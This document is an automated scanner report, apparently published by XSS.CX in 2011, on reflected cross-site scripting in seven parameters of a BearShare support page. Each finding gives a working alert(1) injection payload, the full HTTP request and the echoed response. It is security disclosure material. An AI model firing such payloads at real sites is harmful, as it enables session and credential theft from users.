XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, wa.bearshare.com

Report generated by XSS.CX at Thu Aug 18 09:14:16 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in wa.bearshare.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://wa.bearshare.com/support/sendbug.php [cv parameter]

1.2. http://wa.bearshare.com/support/sendbug.php [err parameter]

1.3. http://wa.bearshare.com/support/sendbug.php [id parameter]

1.4. http://wa.bearshare.com/support/sendbug.php [ie parameter]

1.5. http://wa.bearshare.com/support/sendbug.php [os parameter]

1.6. http://wa.bearshare.com/support/sendbug.php [sp parameter]

1.7. http://wa.bearshare.com/support/sendbug.php [wmp parameter]

2. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://wa.bearshare.com/support/sendbug.php [cv parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the cv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81236"%3balert(1)//f23cffd1d41 was submitted in the cv parameter. This input was echoed as 81236";alert(1)//f23cffd1d41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0&cv=81236"%3balert(1)//f23cffd1d41&sp=&wmp=&ie=&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn4
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "";
           var cv = "81236";alert(1)//f23cffd1d41";
           var sp = "";
           var wmp = "";
           var ie = "";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

               for (var i=0;
...[SNIP]...

1.2. http://wa.bearshare.com/support/sendbug.php [err parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the err request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b117d"%3balert(1)//85b94a0191b was submitted in the err parameter. This input was echoed as b117d";alert(1)//85b94a0191b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0b117d"%3balert(1)//85b94a0191b&cv=&sp=&wmp=&ie=&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn1
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0b117d";alert(1)//85b94a0191b";
           var id = "";
           var cv = "";
           var sp = "";
           var wmp = "";
           var ie = "";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=
...[SNIP]...

1.3. http://wa.bearshare.com/support/sendbug.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbf0b"%3balert(1)//346dc6afb98 was submitted in the id parameter. This input was echoed as cbf0b";alert(1)//346dc6afb98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=cbf0b"%3balert(1)//346dc6afb98&err=0&cv=&sp=&wmp=&ie=&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn6
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "cbf0b";alert(1)//346dc6afb98";
           var cv = "";
           var sp = "";
           var wmp = "";
           var ie = "";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

   
...[SNIP]...

1.4. http://wa.bearshare.com/support/sendbug.php [ie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the ie request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2c32"%3balert(1)//02d592eef1a was submitted in the ie parameter. This input was echoed as a2c32";alert(1)//02d592eef1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0&cv=&sp=&wmp=&ie=a2c32"%3balert(1)//02d592eef1a&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn1
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "";
           var cv = "";
           var sp = "";
           var wmp = "";
           var ie = "a2c32";alert(1)//02d592eef1a";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

               for (var i=0; i<document.forms[0].elements.length; i++) {
               
...[SNIP]...

1.5. http://wa.bearshare.com/support/sendbug.php [os parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the os request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7c64"%3balert(1)//1fe412cb444 was submitted in the os parameter. This input was echoed as d7c64";alert(1)//1fe412cb444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0&cv=&sp=&wmp=&ie=&os=d7c64"%3balert(1)//1fe412cb444&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn3
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "";
           var cv = "";
           var sp = "";
           var wmp = "";
           var ie = "";
           var os = "d7c64";alert(1)//1fe412cb444";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

               for (var i=0; i<document.forms[0].elements.length; i++) {
                   if (document.fo
...[SNIP]...

1.6. http://wa.bearshare.com/support/sendbug.php [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the sp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2e7"%3balert(1)//8823e2aeee2 was submitted in the sp parameter. This input was echoed as 5f2e7";alert(1)//8823e2aeee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0&cv=&sp=5f2e7"%3balert(1)//8823e2aeee2&wmp=&ie=&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn4
Content-Length: 8891

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "";
           var cv = "";
           var sp = "5f2e7";alert(1)//8823e2aeee2";
           var wmp = "";
           var ie = "";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

               for (var i=0; i<document.form
...[SNIP]...

1.7. http://wa.bearshare.com/support/sendbug.php [wmp parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.bearshare.com
Path:   /support/sendbug.php

Issue detail

The value of the wmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d10e0"%3balert(1)//6660eb08c19 was submitted in the wmp parameter. This input was echoed as d10e0";alert(1)//6660eb08c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/sendbug.php?id=&err=0&cv=&sp=&wmp=d10e0"%3balert(1)//6660eb08c19&ie=&os=&topicID=1&problemID=1 HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:54:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
X-Server: wadyn4
Content-Length: 8426

</TD>

<HTML>
   <HEAD>
       <TITLE>BearShare Support</TITLE>
       <META name="description" content="BearShare enables you to access over 2,000,000 licensed music downloads, diverse and evolving music communi
...[SNIP]...
<SCRIPT language="javascript">
           var err = "0";
           var id = "";
           var cv = "";
           var sp = "";
           var wmp = "d10e0";alert(1)//6660eb08c19";
           var ie = "";
           var os = "";

           function verifyForm() {
               var verified = true;
               var browser=new Array(4);
               var browserOS=new Array(2);

               for (var i=0; i<document.forms[0].elements.len
...[SNIP]...

2. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wa.bearshare.com
Path:   /support/data/answers/H2accounts.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /support/data/answers/H2accounts.txt HTTP/1.1
Host: wa.bearshare.com
Proxy-Connection: keep-alive
Referer: http://wa.bearshare.com/support/helpme.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: text/html
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: appid_sh=1; __utma=21860136.1440126692.1313679213.1313679213.1313679213.1; __utmb=21860136.4.10.1313679213; __utmc=21860136; __utmz=21860136.1313679213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Aug 2011 14:53:52 GMT
Content-Type: text/plain
Content-Length: 744
Last-Modified: Thu, 04 Jan 2007 17:05:19 GMT
Connection: keep-alive
Keep-Alive: timeout=30
Accept-Ranges: bytes

You can log in to your account from up to three different computers at the same time. <br><br>

To log in from a fourth computer you first need to deactivate one of the active computers through the
...[SNIP]...

Report generated by XSS.CX at Thu Aug 18 09:14:16 GMT-06:00 2011.